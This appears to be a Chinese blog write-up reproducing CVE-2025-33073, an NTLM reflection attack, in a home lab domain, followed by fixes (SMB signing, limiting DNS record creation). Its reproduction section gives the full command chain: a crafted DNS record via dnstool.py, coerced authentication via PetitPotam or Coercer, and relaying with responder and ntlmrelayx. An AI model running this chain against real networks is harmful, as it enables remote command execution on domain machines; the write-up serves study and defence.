【内网渗透】也聊CVE-2025-33073 NTLM Reflection攻击

目录

Intro

环境搭建

复现 

修复


Intro

期末周无聊,看看微软最近的这个洞

NVD - CVE-2025-33073

CVE-2025-33073 漏洞属于 NTLM Reflection(NTLM反射)攻击,而NTLM Reflection攻击是NTLM Relay(NTLM 中继)攻击的一种特殊形式,指的是将获得的受害者机器的NTLM认证请求重新反射回发送该请求的原始机器(即受害者机器)

通过利用该漏洞,攻击者只要有任意权限的域用户权限且目标机器不开启 SMB 签名就能远程命令执行,而在大部分情况下,SMB 签名默认只有域控开,域内机器大多数是不开的。

环境搭建

参见:

域环境搭建 - ntrack - 博客园

  • 域:Z3r4y.com

  • 域控:192.168.233.144

  • 攻击者机器(kali):192.168.233.130

  • 攻击目标: CubicU-PC.Z3r4y.com (192.168.233.129)

  • 普通域用户:test

复现 

 创建一个特殊DNS记录,指向攻击者的机器192.168.233.130

python3 dnstool.py -u Z3r4y.com\\test -p "0x401@admin" -r localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.233.130 --action add 192.168.233.144

  进行强制触发,让目标机器向指定DNS记录进行NTLM认证

python3 PetitPotam.py -d Z3r4y.com -u test -p 0x401@admin localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.233.129

 接收到目标机器的NTLM

responder -I eth0 -v

进行后续利用

impacket-ntlmrelayx -t 192.168.233.129 -smb2support

顺带一提,用Coercer通用性更强

https://github.com/p0dalirius/Coercer 

  • PetitPotam

    • 仅支持 MS-EFSRPC(Encrypting File System Remote Protocol),通过 EfsRpcOpenFileRaw 强制目标主机向攻击者发起认证。

    • 主要针对 Windows 的 EFS 功能,但微软已通过补丁(如 CVE-2021-36942)修复默认安全问题,限制了其通用性。

  • Coercer

    • 支持多种 RPC/MSRPC 协议,包括但不限于:

      • MS-EFSRPC(同 PetitPotam)

      • MS-RPRN(打印服务,类似 PrintSpooler 漏洞)

      • MS-FSRVP(卷影复制服务)

      • MS-DFSNM(DFS 命名空间管理)

      • 等十几种协议。

通过轮询RPC也可强制访问

python3 Coercer.py coerce -d Z3r4y.com -u test -p 0x401@admin -l localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -t 192.168.233.129

修复

1.开启SMB签名

Set-SmbClientConfiguration -RequireSecuritySignature $true
Set-SmbServerConfiguration -RequireSecuritySignature $true

2.禁止普通域用户新建DNS记录

默认情况下AD域内所有经过身份认证的普通域用户均具备新建 DNS 记录权限

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值